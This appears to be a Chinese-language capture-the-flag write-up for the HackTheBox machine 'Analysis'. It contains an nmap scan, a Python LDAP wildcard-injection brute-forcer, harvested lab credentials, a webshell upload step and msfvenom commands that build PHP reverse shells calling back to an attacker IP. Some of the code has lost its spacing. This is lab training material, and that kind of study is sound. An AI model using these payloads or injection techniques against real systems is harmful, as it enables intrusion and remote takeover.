$ nmap -sC -sV 10.10.11.250 Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-22 13:43 CST Nmap scan report for 10.10.11.250 Host is up (0.14s latency). Not shown: 987 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-22 05:44:20Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3306/tcp open mysql MySQL (unauthorized) Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 73.26 seconds
WORDARRAY = [i for i in string.ascii_letters + string.digits] WORDARRAY.append("\=") WORDARRAY.append("\*") WORDARRAY.append("\#") WORDARRAY.append("{") WORDARRAY.append("}") WORDARRAY.append("\(") WORDARRAY.append("\)")
defcheck_append(): result = "" whileTrue: for i in WORDARRAY: if check_data(result + i + "*"): result += i log.debug(f"Result: {result}") break else: break return result defcheck_prepend(): result = "" whileTrue: for i in WORDARRAY: if check_data("*" + i + result): result = i + result log.debug(f"Result: {result}") break else: break return result defmain(): log.info(check_prepend()) log.info(check_append())
if __name__ == "__main__": main()
dashboard
得到的账号密码可以登录dashboard:
1 2
technician@analysis.htb 97nttl*4qp96bv
webshell
然后soc report那里可以直接上传webshell,路径就是前面可以看到的uploads:
1 2 3 4
msfvenom -p php/reverse_php LHOST=10.10.16.12 LPORT=4444 -f raw > shell.php msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.16.12 LPORT=4444 -f raw > shell.php